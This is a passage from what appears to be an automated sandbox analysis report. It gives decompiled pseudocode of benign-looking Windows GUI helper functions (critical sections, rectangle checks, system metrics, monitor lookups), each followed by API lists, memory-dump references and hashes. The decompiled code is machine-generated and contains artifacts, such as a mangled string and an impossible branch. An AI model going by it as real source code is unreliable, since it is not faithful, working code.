                                  				_pop(_t67);
                                  				 *[fs:eax] = _t67;
                                  				_push(0x42df16);
                                  				_push("�A&");
                                  				L00406C2C();
                                  				return 0;
                                  			}













                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(A&), ref: 0042DECB
                                  • RtlLeaveCriticalSection.KERNEL32(A&,0042DF16,A&), ref: 0042DF09
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave
                                  • String ID: A&
                                  • API String ID: 3168844106-3747508005
                                  • Opcode ID: ddbc8fc78b6c7f1fa93ca66b9a9f7a22e2fdfe8cb1ecc04daa0821806b82dd7b
                                  • Instruction ID: 12cd8a3e89b4db3b2346efe9eb26de6beb34a5937bc5b8145537d2d7458227e8
                                  • Opcode Fuzzy Hash: ddbc8fc78b6c7f1fa93ca66b9a9f7a22e2fdfe8cb1ecc04daa0821806b82dd7b
                                  • Instruction Fuzzy Hash: 44216D74A04208AFC711DF69D88198DBBF5FF49720B6281AAF844A7361C674AD41CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00447100(void* __eflags, intOrPtr _a4) {
                                  				char _v5;
                                  				struct tagRECT _v21;
                                  				struct tagRECT _v40;
                                  				void* _t40;
                                  				void* _t41;
                                  				void* _t46;
                                  
                                  				_v5 = 1;
                                  				_t45 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                  				_t46 = E0041C898( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                  				if(_t46 <= 0) {
                                  					L5:
                                  					_v5 = 0;
                                  				} else {
                                  					do {
                                  						_t46 = _t46 - 1;
                                  						_t40 = E0041C834(_t45, _t41, _t46);
                                  						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                  							goto L4;
                                  						} else {
                                  							E004466E4(_t40,  &_v40);
                                  							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                  							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                  								goto L4;
                                  							}
                                  						}
                                  						goto L6;
                                  						L4:
                                  					} while (_t46 > 0);
                                  					goto L5;
                                  				}
                                  				L6:
                                  				return _v5;
                                  			}










                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: 4d2859a6f689d045f69b750fe6ea78c87270f48bbb28b3f452f74f07d38d333f
                                  • Instruction ID: ae26e8324eb68ea108a47afbcfa4f8a7a3ce0fc142bf4169a9f1199e3112fd89
                                  • Opcode Fuzzy Hash: 4d2859a6f689d045f69b750fe6ea78c87270f48bbb28b3f452f74f07d38d333f
                                  • Instruction Fuzzy Hash: 42118F31A082485BD701EA6CC884BDF7BE89F49318F040296FD04EB382D739DD058794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E0046FAC4(char __edx, void* __edi, void* __esi, void* __fp0) {
                                  				char _v5;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				void* _t15;
                                  				signed int _t24;
                                  				signed int _t25;
                                  				signed int _t28;
                                  				void* _t31;
                                  				void* _t34;
                                  				void* _t35;
                                  				char _t36;
                                  				signed int _t40;
                                  				void* _t42;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  				void* _t50;
                                  
                                  				_t50 = __fp0;
                                  				_t43 = __esi;
                                  				_t42 = __edi;
                                  				_t36 = __edx;
                                  				if(__edx != 0) {
                                  					_t45 = _t45 + 0xfffffff0;
                                  					_t15 = E00403984(_t15, _t44);
                                  				}
                                  				_v5 = _t36;
                                  				_t34 = _t15;
                                  				E004492A4(_t34, _t35, 0, _t42, _t43, _t50);
                                  				E004464D8(_t34, GetSystemMetrics(2));
                                  				E004464FC(_t34, GetSystemMetrics(0x14));
                                  				_t24 =  *(_t34 + 0x4c);
                                  				_t40 = _t24;
                                  				_t25 = _t24 >> 1;
                                  				if(0 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				E004464FC(_t34, _t40 + _t25);
                                  				 *((char*)(_t34 + 0x208)) = 1;
                                  				 *((char*)(_t34 + 0x21f)) = 0;
                                  				 *((short*)(_t34 + 0x21c)) = 0;
                                  				 *((short*)(_t34 + 0x210)) = 0;
                                  				 *((short*)(_t34 + 0x212)) = 0x64;
                                  				 *((intOrPtr*)(_t34 + 0x214)) = 1;
                                  				 *((char*)(_t34 + 0x228)) = 1;
                                  				 *((char*)(_t34 + 0x229)) = 1;
                                  				 *((char*)(_t34 + 0x21e)) = 1;
                                  				_t28 =  *0x46fb8c; // 0x80
                                  				 *(_t34 + 0x50) =  !_t28 &  *(_t34 + 0x50);
                                  				_t31 = _t34;
                                  				if(_v5 != 0) {
                                  					E004039DC(_t31);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t34;
                                  			}






















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MetricsSystem
                                  • String ID: d
                                  • API String ID: 4116985748-2564639436
                                  • Opcode ID: 3790f5cc04b8850676be5841b0fc3ab8dda7e5c60d3cc87a6ac301d7d5c96fbb
                                  • Instruction ID: 1d1a04d975221d904c01a2e751fe48b69471b0669f5214f53588a403f038cca9
                                  • Opcode Fuzzy Hash: 3790f5cc04b8850676be5841b0fc3ab8dda7e5c60d3cc87a6ac301d7d5c96fbb
                                  • Instruction Fuzzy Hash: D81154617442849EEB00EF7DD8CA3957A905F1531CF0841BDEC488F397E6BFA548876A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0043005C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t15;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				signed int _t19;
                                  				void* _t20;
                                  				intOrPtr _t21;
                                  
                                  				_t19 = _a12;
                                  				if( *0x4bc92f != 0) {
                                  					_t16 = 0;
                                  					if((_t19 & 0x00000003) != 0) {
                                  						L7:
                                  						_t16 = 0x12340042;
                                  					} else {
                                  						_t21 = _a4;
                                  						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                  							goto L7;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 =  *0x4bc910; // 0x43005c
                                  					 *0x4bc910 = E0042FDB8(3, _t15, "MonitorFromPoint", _t18, _t20);
                                  					_t16 =  *0x4bc910(_a4, _a8, _t19);
                                  				}
                                  				return _t16;
                                  			}













                                  APIs
                                  • GetSystemMetrics.USER32 ref: 004300AA
                                  • GetSystemMetrics.USER32 ref: 004300BC
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  • Opcode ID: e1cb2bee3c50bea4e161f18fc3fd2d5f93892fecf2ba1476a34614ff905d67a3
                                  • Instruction ID: f31d48d4fa32f0209276210ebed0a68fd131649c1defd771c6d0b175906453f7
                                  • Opcode Fuzzy Hash: e1cb2bee3c50bea4e161f18fc3fd2d5f93892fecf2ba1476a34614ff905d67a3
                                  • Instruction Fuzzy Hash: 3401F271203208EFEB148F11ECC5F9A7B71EB48758F406236F9148F251C3769C0087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0042FF34(intOrPtr* _a4, signed int _a8) {
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t17 = _a8;
                                  				_t14 = _a4;
                                  				if( *0x4bc92e != 0) {
                                  					_t19 = 0;
                                  					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                  						_t19 = 0x12340042;
                                  					}
                                  				} else {
                                  					_t16 =  *0x4bc90c; // 0x42ff34
                                  					 *0x4bc90c = E0042FDB8(2, _t14, "MonitorFromRect", _t16, _t18);
                                  					_t19 =  *0x4bc90c(_t14, _t17);
                                  				}
                                  				return _t19;
                                  			}












                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042FF85
                                  • GetSystemMetrics.USER32 ref: 0042FF91
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect
                                  • API String ID: 1792783759-4033241945
                                  • Opcode ID: cd32cc2d0fc1bee38542657140d82b576de08b3cfa5db766b9202f5208fdad25
                                  • Instruction ID: b141c8f1244ddef99d9ba07b94cb809abcc4167537fe89a01e4fabc4be78ebec
                                  • Opcode Fuzzy Hash: cd32cc2d0fc1bee38542657140d82b576de08b3cfa5db766b9202f5208fdad25
                                  • Instruction Fuzzy Hash: 72014F713001289BEB108B25EAC5B56B775DB46355FC68177E944CB202C378AC488BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%